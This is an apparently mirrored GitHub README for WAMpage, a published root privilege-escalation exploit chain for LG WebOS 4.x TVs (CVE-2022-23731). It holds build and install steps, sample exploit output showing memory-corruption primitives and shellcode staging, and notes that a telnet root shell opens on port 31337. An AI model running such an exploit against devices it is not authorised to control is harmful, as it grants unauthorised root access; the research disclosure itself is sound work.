DavidBuchanan314 / WAMpage

WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731)

Home Page:https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

WAMpage

WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731)

This exploit is mainly of interest to other researchers - if you just want to root your TV, you probably want RootMyTV, which offers a reliable 1-click persistent root.

Currently only supports WebOS 4.x on 32-bit SoCs. This software is provided AS IS, use at your own risk, etc. etc.

Writeup: https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

image

Building

Prerequesites:

apt install qemu-user
npm install -g @webosose/ares-cli

Compiling:

make

Testing Locally

make test will build and run the exploit in d8, running in qemu-arm. (A pre-compiled version of d8 and its dependencies are included in the bin/ directory). If the exploit works succesfully, you'll probably get something like this:

[+] Starting WAMpage...
[+] addrof(myobj) = 0x5a68f5d1
[+] Test: reconstructed myobj: {"foo":"bar"}
[+] Set up arbread32/arbwrite32.
[+] stage2 shellcode loaded @ 0xff458000
[+] myfunc @ 0x5a693369
[+] stage1 RWX buf @ 0x5bb8f280
[+] Copied stage1 shellcode. Calling...
Traceback (most recent call last):
  File "<stdin>", line 25, in <module>
IOError: [Errno 13] Permission denied: '/dev/mem'

The permission error is expected, assuming your machine isn't totally misconfigured.

You can test the devmemes.py exploit by running it directly on a TV, but you'll either need root to begin with, or some other kind of unsandboxed/unjailed shell.

Installation on TV

You can use ares-install, or manually copy over the IPK and run this from the devmode shell:

luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"tv.rootmy.wampage","ipkUrl":"/path/to/wampage.ipk","subscribe":true}'

Running on TV

Launch the app and press the "Start Exploit" button. If all goes well, a telnet server should open up on port 31337.

About

WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731)

https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

License:MIT License


Languages

Language:JavaScript 53.9%Language:Python 18.9%Language:Makefile 11.0%Language:Assembly 5.5%Language:HTML 4.9%Language:C 4.1%Language:Shell 1.7%